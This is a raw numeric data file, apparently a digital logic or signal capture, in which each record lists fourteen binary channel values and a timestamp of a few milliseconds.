0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.2217080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2217320e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.2217560e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2217840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.2218080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2218280e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2218360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2218600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2218840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2219080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2219320e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2219560e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2219840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2220080e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2220360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2220400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2220840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2221080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2221160e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2221320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2221560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2221840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2222080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2222360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2222600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2223080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2223320e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2223400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2223600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2223840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2224080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2224360e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2224600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2224840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2225080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2225320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2225400e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2225840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2226120e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2226360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2226600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2226640e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2227080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2227320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2227400e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2227840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2228120e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2228360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2228600e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2228840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2229080e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2229320e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2229560e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2229640e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2230120e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2230360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2230600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2230840e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2230880e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2230920e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2231080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2231320e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2231840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2232120e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2232360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2232600e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2232840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2233080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2233160e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2233320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2233560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2233840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2234080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2234360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2234600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2234840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2235080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2235320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2235560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2236120e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2236360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2236400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2236840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2237080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2237160e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2237600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2237840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2238120e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2238360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2238600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2238840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2238880e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2239320e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2239600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2239640e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2240120e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2240360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2240400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2240600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2240840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2241080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2241320e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2241560e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2241840e-03 0,0,0,0,1,1,0,0,0,0,0,0,0,0,4.2241880e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2241920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2242360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2242600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2242840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2243080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2243320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2243560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2243840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2244080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2244360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2244600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2244840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2245080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2245320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2245560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2245840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2246080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2246360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2246600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2246840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2247080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2247320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2247560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2247840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2248080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2248120e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2248600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2248840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2248920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2249080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2249320e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2249560e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2249840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2250080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2250360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2250840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2251080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2251160e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2251320e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2251600e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2251840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2252080e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2252360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2252600e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2252840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2253080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2253160e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2253600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2253840e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2254120e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2254360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2254400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2254600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2254840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2255320e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2255600e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2255840e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2256120e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2256360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2256600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2256680e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2256840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2257080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2257320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2257560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2257840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2258080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2258360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2258600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2258840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2259080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2259320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2259560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2259840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2260080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2260360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2260600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2260840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2261080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2261320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2261560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2262120e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2262360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2262400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2262600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2262840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2263080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2263320e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2263560e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2263840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2264080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2264360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2264400e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2264840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2265080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2265320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2265600e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2266120e-03 0,0,0,0,1,0,0,0,0,1,0,0,0,0,4.2266360e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2266400e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2266600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2266840e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2267080e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2267320e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2267560e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2267800e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2268040e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2268320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2268360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2268840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2269080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2269320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2269560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2269800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2270040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2270320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2270560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2270840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2271080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2271320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2271560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2271800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2272040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2272320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2272560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2272840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2273080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2273320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2273560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2273800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2274040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2274320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2274560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2274840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2275080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2275320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2275560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2275800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2276040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2276320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2276560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2276840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2277080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2277320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2277560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2277800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2278040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2278320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2278560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2278840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2279080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2279320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2279560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2279800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2280040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2280320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2280560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2280840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2281080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2281320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2281560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2281800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2282040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2282320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2282560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2282840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2283080e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2283320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2283560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2283800e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2284040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2284320e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2284560e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2284600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.3529000e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,4.3531080e-03 1,0,0,0,1,1,0,0,0,1,0,1,0,1,4.3531360e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,4.3531640e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,1,4.3534840e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,4.3535080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,4.3535160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,4.3535320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,4.3535600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,4.3535800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,4.3536040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,4.3536320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,4.3536600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,4.3536840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,4.3537080e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,4.3537320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3537360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3537600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3537840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3538040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3538360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3538600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3538840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3539080e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3539320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3539600e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3539640e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3540120e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3540360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3540440e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3540600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3540840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3541080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3541320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3541600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3541800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3541880e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3542320e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3542600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3542640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3542840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3543080e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3543320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3543560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3543800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3544040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3544320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3544560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3544600e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3544840e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3545080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3545160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3545320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3545560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3545640e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3546080e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3546320e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3546560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3546840e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,4.3546880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3546920e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3547080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3547320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3547560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3547800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3548040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3548320e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3548360e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3548840e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3549080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3549160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3549320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3549560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3549800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3550040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3550120e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3550600e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3550840e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,4.3550880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3550920e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3551080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3551320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3551560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3551800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3552040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3552320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3552560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3552840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3553080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3553320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3553560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3553800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3554040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3554320e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3554360e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3554560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3554840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3555080e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3555320e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3555560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3555800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3555880e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3556320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3556560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3556840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3557120e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3557560e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3558000e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3558560e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3558800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3559000e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,4.3559080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3559120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3559600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3559800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3560040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3560280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3560520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3560720e-03 1,0,0,0,1,0,0,0,0,1,0,0,0,0,4.3560760e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3560800e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3561160e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3561400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3561480e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3561640e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3561840e-03 